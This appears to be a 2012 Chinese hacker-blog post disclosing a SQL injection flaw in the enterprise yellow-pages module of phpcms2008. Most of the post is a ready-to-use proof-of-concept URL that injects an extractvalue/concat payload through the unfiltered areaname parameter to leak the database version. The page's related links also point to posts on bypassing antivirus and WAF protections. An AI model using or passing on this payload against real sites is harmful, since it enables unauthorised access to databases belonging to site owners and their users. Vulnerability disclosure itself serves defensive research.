黑侠网络
  • 添加菜单
当前位置:黑侠网络 > 技术教程 > phpcms2008企业黄页模块SQL注射漏洞
matrix 技术教程 2012-05-13

phpcms2008企业黄页模块SQL注射漏洞

phpcms 企业黄页模块由于参数未过滤存在SQL注射漏洞,允许攻击者执行SQL语句.0day是幌子,鸡肋是真的,由于影响比较小,不会造成什么危害,N久之前发现的鸡肋,发出来给博客滥竽充数啦.

漏洞证明:


http://www.127.0.0.1.com/phpcms2008/phpcms/yp/product.php?catid=1&areaname=555%27%20and%20extractvalue%281,concat%280×09,%28version%28%29%29%29%29%20and%20%271%27=%271


黑侠网络,免费分享互联网!
黑侠网络 » phpcms2008企业黄页模块SQL注射漏洞

matrix 普通

分享到:
上一篇
绕过护卫神云查杀系统的方法
下一篇
可突破安全狗的aspx一句话

相关推荐

www.milw0rm.com关闭一年多了吧…

www.milw0rm.com关闭一年多了吧…

lost,网络营销的前景在何方?

lost,网络营销的前景在何方?

发现一个不错的系统pbdigg cms

发现一个不错的系统pbdigg cms

入侵?来google试试

入侵?来google试试

标签
aspxspy DarkBlade ddos ewebeditor fckeditor godaddy-500-error godaddy域名续费优惠券 godaddy空间错误 jspspy linux-Centos-VPS matrix metasploit milw0rm milw0rm.com milw0rm关闭 milw0rm网站 mysql netifera phpcms2008sp4 phpcms火车头采集器 phpcms采集 renrencom seo seo插件 SeraWebInfo w3 total cache webshell提权 web压力测试 wordpress wordpress优化 wordpress插件 xss 上传漏洞 入侵安全检测 旁注 百姓网 网站压力测试 网站被入侵 网站负载能力测试 网络安全 网络安全维护 防ddos 黑侠网络 黑客 黑客学习
© 2018 粤ICP备2022010071号 粤ICP备2022010071号
黑侠网络